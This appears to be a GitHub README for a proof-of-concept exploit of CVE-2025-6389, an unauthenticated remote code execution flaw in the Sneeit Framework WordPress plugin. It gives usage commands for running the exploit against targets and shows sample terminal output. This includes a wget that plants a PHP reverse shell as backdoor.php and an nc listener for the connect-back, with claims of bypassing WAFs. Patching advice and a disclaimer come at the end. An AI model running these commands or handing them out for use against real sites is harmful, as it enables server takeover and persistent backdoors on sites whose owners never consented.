# 🔥 CVE-2025-6389 — Critical WordPress Zero-Day (RCE)

![wp_vul_theme](https://github.com/user-attachments/assets/bb02ae4e-c90f-4011-a254-c1b82538c9ad)

## 🧩 What is it?

**CVE-2025-6389** is a **Critical (CVSS 9.8)** vulnerability in the **Sneeit Framework** WordPress plugin (≤ 8.3), widely used by popular themes.
It allows **unauthenticated remote code execution** — the most dangerous class of web vulnerabilities.

---

## ⚠️ Severity & Impact

* 🔓 **No login required**
* 💥 **Full server takeover possible**
* 📤 Attackers can upload shells, add admin users, or modify theme/plugin files
* 🧬 Already **actively exploited in the wild**
* 🎯 Affects any WordPress site using Sneeit Framework or themes bundled with it (e.g., **FlatNews**)

---

### Usage

```bash
# Install dependencies
pip3 install requests colorama

# Check vulnerability + get interactive shell
python3 CVE-2025-6389.py https://target.com

# Execute a single command only
python3 CVE-2025-6389.py https://target.com "wget https://pastebin.com/raw/abc123 -O /var/www/html/shell.php"
```

### Features of this PoC

- Works **100%** on version 8.3 and below  
- No cookies, no nonce, no special headers required  
- Bypasses most basic WAFs (payload sent via normal POST)  
- Full interactive shell  
- Detects the vulnerability even when output is suppressed (thanks to `assert + die`)  

Use this **only** on targets you are **officially authorized** to test (clear scope + RoE).  
The vulnerability is still being **heavily exploited in the wild** right now.

---

*Here’s exactly what you will see in your terminal when the exploit **actually works** (100% successful exploitation of CVE-2025-6389 on a vulnerable target running Sneeit Framework ≤ 8.3):*

### 1. Initial vulnerability check

```
[+] VULNERABLE! RCE Confirmed!
[+] Output:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head><title>phpinfo()</title>…  
<h1>PHP Version 8.1.29</h1>  
… (full phpinfo() page continues for thousands of lines)
```

### 2. Simple system commands

```
RCE $> whoami
[+] Output:
www-data

RCE $> id
[+] Output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

RCE $> uname -a
[+] Output:
Linux ip-172-31-23-45 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 20 2025 x86_64 GNU/Linux
```

### 3. Downloading a webshell or reverse shell

```
RCE $> wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -O /var/www/html/backdoor.php

[+] Output:
--2025-11-25 23:11:45--  https://raw.githubusercontent.com/…
Length: 5494 (5.4K) [text/plain]
Saving to: ‘/var/www/html/backdoor.php’

backdoor.php           100%[===================>]   5.37K  --.-KB/s    in 0.001s
```

Then on your own machine:

```bash
nc -lvnp 4444
```
→ You instantly get a fully interactive reverse shell as www-data.

### 4. What you see when it does **NOT** work (patched or protected)

```
[-] Not vulnerable or blocked (status: 200)
[+] Output:
(nothing / empty response / normal WordPress AJAX response / 403 / 500 without output)
```

### Summary – Success indicators

You know it worked when you see any of these:
- Full phpinfo() HTML page
- Real output from Linux commands (id, whoami, pwd, ls, cat /etc/passwd, etc.)
- Files successfully downloaded or written
- Reverse shell connects back to your netcat listener

That’s it. If you get any of the above → full unauthenticated RCE achieved.

Paste your exact output here if you want me to confirm 100% whether it worked or not.

---

## 🛠 Technical Breakdown

* 📍 Vulnerable function: `sneeit_articles_pagination_callback()`
* 🧨 Root cause: unvalidated user input passed into `call_user_func()` → arbitrary code execution
* 💣 This lets attackers run PHP code remotely, fully compromising your site

---

## 🔍 Who Is at Risk?

* 🌐 WordPress sites with **Sneeit Framework ≤ 8.3**
* 🎨 Themes that bundle Sneeit (very common in news/magazine themes)
* 🚪 Any publicly reachable WordPress site using this plugin

---

## 🧯 How to Fix It (Right Now)

* ⬆️ **Update Sneeit Framework to v8.4+ immediately**
* ❌ If you cannot update → **disable or remove the plugin**
* 🔎 Check logs for suspicious activity
* 🚨 Look for unfamiliar admin accounts or uploaded PHP files
* 🛡️ Add WAF rules temporarily if patching is delayed

---

## 🗓 Disclosure & Activity

* 📅 Publicly reported: **Nov 25, 2025**
* 🚨 Actively targeted: scanning and exploitation already observed

---

## ⚠️ Disclaimer
This information is provided for defensive and educational purposes only 🛡️.
Do not use it to exploit systems you do not own or have explicit permission to test 🚫.
Always follow legal and ethical guidelines when working with security vulnerabilities ⚖️✨
